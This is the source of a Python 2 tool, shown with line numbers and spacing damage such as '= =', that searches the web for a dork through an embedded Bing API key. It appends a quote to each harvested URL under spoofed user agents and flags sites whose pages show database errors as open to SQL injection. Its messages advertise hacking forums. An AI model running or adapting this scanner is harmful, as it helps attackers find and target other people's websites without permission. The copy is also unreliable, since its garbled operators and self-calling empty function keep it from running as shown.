#!/usr/bin/python |
002 | |
003 | import sys, subprocess, re, Queue, urllib, urllib2, threading, random |
004 | from xml.dom import minidom |
005 | from optparse import OptionParser |
006 | from time import sleep |
007 | |
008 | def logo(): |
009 |
010 | if sys.platform = = 'linux' or sys.platform = = 'linux2' : |
011 | subprocess.call( "clear" , shell = True ) |
012 | logo() |
013 | else : |
014 | subprocess.call( "cls" , shell = True ) |
015 | logo() |
016 | |
017 | threads = [] |
018 | urls = [] |
019 | vuln = [] |
020 | pager = 50 |
021 | counter = 0 |
022 | |
023 | header = [ 'Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)' , |
024 | 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre' , |
025 | 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;' , |
026 | 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)' , |
027 | 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)' , |
028 | 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)' , |
029 | 'Microsoft Internet Explorer/4.0b1 (Windows 95)' , |
030 | 'Opera/8.00 (Windows NT 5.1; U; en)' , |
031 | 'amaya/9.51 libwww/5.4.0' , |
032 | 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)' , |
033 | 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' , |
034 | 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)' , |
035 | 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)' , |
036 | 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)' , |
037 | 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]' ] |
038 | |
039 | sqlerrors = { 'MySQL' : 'error in your SQL syntax' , |
040 | 'MiscError' : 'mysql_fetch' , |
041 | 'MiscError2' : 'num_rows' , |
042 | 'Oracle' : 'ORA-01756' , |
043 | 'JDBC_CFM' : 'Error Executing Database Query' , |
044 | 'JDBC_CFM2' : 'SQLServer JDBC Driver' , |
045 | 'MSSQL_OLEdb' : 'Microsoft OLE DB Provider for SQL Server' , |
046 | 'MSSQL_Uqm' : 'Unclosed quotation mark' , |
047 | 'MS-Access_ODBC' : 'ODBC Microsoft Access Driver' , |
048 | 'MS-Access_JETdb' : 'Microsoft JET Database' , |
049 | 'Error Occurred While Processing Request' : 'Error Occurred While Processing Request' , |
050 | 'Server Error' : 'Server Error' , |
051 | 'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error' , |
052 | 'Invalid Querystring' : 'Invalid Querystring' , |
053 | 'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC' , |
054 | 'VBScript Runtime' : 'VBScript Runtime' , |
055 | 'ADODB.Field' : 'ADODB.Field' , |
056 | 'BOF or EOF' : 'BOF or EOF' , |
057 | 'ADODB.Command' : 'ADODB.Command' , |
058 | 'JET Database' : 'JET Database' , |
059 | 'mysql_fetch_array()' : 'mysql_fetch_array()' , |
060 | 'Syntax error' : 'Syntax error' , |
061 | 'mysql_numrows()' : 'mysql_numrows()' , |
062 | 'GetArray()' : 'GetArray()' , |
063 | 'FetchRow()' : 'FetchRow()' , |
064 | 'Input string was not in a correct format' : 'Input string was not in a correct format' , |
065 | 'Not found' : 'Not found' } |
066 | |
067 | parser = OptionParser() |
068 | |
069 | parser.add_option( "-d" , dest = "dork" , help = "Dork for search" , type = "string" ) |
070 | parser.add_option( "-c" , dest = "scan" , help = "Number of links to collect" , type = "int" ) |
071 | parser.add_option( "-t" , dest = "nthreads" , help = "Number of threads" , type = "int" ) |
072 | |
073 | try : |
074 | (options, args) = parser.parse_args() |
075 | if options.dork ! = None : |
076 | dork = options.dork |
077 | else : |
078 | parser.print_help() |
079 | sys.exit( 1 ) |
080 | |
081 | if options.scan ! = None : |
082 | pager = options.scan |
083 | else : |
084 | parser.print_help() |
085 | sys.exit( 1 ) |
086 | |
087 | if options.nthreads ! = None : |
088 | nthreads = options.nthreads |
089 | else : |
090 | parser.print_help() |
091 | sys.exit( 1 ) |
092 | |
093 | except (KeyboardInterrupt): |
094 | print "[-] Exiting, thanx for using tool, please visit ljuska.org & darkartists.info" |
095 | sys.exit( 1 ) |
096 | |
097 | |
098 | def search(dork, page): |
099 | global urls |
100 | |
101 | appids = [ '01CDBCA91C590493EE4E91FAF83E5239FEF6ADFD' , 'C2B36F733D8DCB48CE2E075CC145014122BE4724' ] |
102 | appid = random.choice(appids) |
103 | url = 'http://api.search.live.net/xml.aspx?Appid=%s&query=%s&sources=web&market=en-us&web.count=50&web.offset=%s' % (appid, urllib.quote(dork), str (page)) |
104 | url_open = urllib2.urlopen(url) |
105 | xml = minidom.parse(url_open) |
106 | name = xml.getElementsByTagName( 'web:Url' ) |
107 | for n in name: |
108 | urls.append(n.childNodes[ 0 ].data) |
109 | |
110 | |
111 | class vulnScanner(threading.Thread): |
112 | def __init__( self , queue): |
113 | self .__queue = queue |
114 | threading.Thread.__init__( self ) |
115 | |
116 | def run( self ): |
117 | global counter |
118 | while True : |
119 | url = self .__queue.get() |
120 | if url is None : |
121 | break |
122 | |
123 | host = url + "'" |
124 | try : |
125 | request_web = urllib2.Request(host) |
126 | agent = random.choice(header) |
127 | request_web.add_header( 'User-Agent' , agent) |
128 | source = urllib2.urlopen(request_web).read() |
129 | for type , eMSG in sqlerrors.items(): |
130 | if re.search(eMSG, source): |
131 | if not url in vuln: |
132 | print "[!] w00t,w00t!: " , host, "Error: " , type , " ---> SQL Injection Found" |
133 | vuln.append(url) |
134 | |
135 | except (KeyboardInterrupt): |
136 | print "[-] Exiting, thanx for using tool, please visit ljuska.org & darkartists.info" |
137 | sys.exit( 1 ) |
138 | except : |
139 | pass |
140 | |
141 | counter + = 1 |
142 | |
143 | def startThreads(): |
144 | queue = Queue.Queue( 0 ) |
145 | for i in range (nthreads): |
146 | scan = vulnScanner(queue).start() |
147 | |
148 | for i in range ( len (urls)): |
149 | queue.put(urls[i]) |
150 | |
151 | for i in range (nthreads): |
152 | queue.put( None ) |
153 | |
154 | if __name__ = = "__main__" : |
155 | try : |
156 | print "[!] Dork: %s" % dork |
157 | print "[!] Sites to scan: %s" % pager |
158 | print "[!] Number of threads: %s" % nthreads |
159 | |
160 | |
161 | for i in range ( 0 , (pager / 50 )): |
162 | search(dork, 1 + i) |
163 | print "[!] Number of collected urls: %s\\n" % len (urls) |
164 | startThreads() |
165 | while counter < len (urls): |
166 | sleep( 1 ) |
167 | print "\\n[!] Vulnerable urls found: %s" % len (vuln) |
168 | print "[-] Exiting, thanx for using tool, please visit ljuska.org & darkartists.info" |
169 | sys.exit( 1 ) |
170 | except (KeyboardInterrupt): |
171 | print "[-] Exiting, thanx for using tool, please visit ljuska.org & darkartists.info" |
172 | sys.exit( 1 ) |
文章来源:
学什么网